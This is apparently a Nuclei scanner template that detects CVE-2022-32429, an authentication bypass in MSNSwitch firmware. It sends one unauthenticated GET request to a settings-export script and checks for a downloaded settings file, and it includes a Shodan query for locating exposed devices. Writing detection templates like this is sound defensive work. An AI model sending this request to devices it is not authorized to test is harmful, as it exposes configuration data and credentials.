nuclei-templates/http/cves/2022/CVE-2022-32429.yaml

50 lines
1.5 KiB
YAML

id: CVE-2022-32429
info:
name: MSNSwitch Firmware MNT.2408 - Authentication Bypass
author: theabhinavgaur
severity: critical
description: |
MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
reference:
- https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
- https://elifulkerson.com/CVE-2022-32429/
- https://nvd.nist.gov/vuln/detail/CVE-2022-32429
- http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-32429
cwe-id: CWE-287
epss-score: 0.02388
metadata:
max-request: 1
shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
verified: true
tags: config,dump,packetstorm,cve,cve2022,msmswitch,unauth,switch
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SSID1"
- type: regex
part: header
regex:
- 'filename="Settings(.*).dat'
- 'application/octet-stream'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2023/04/10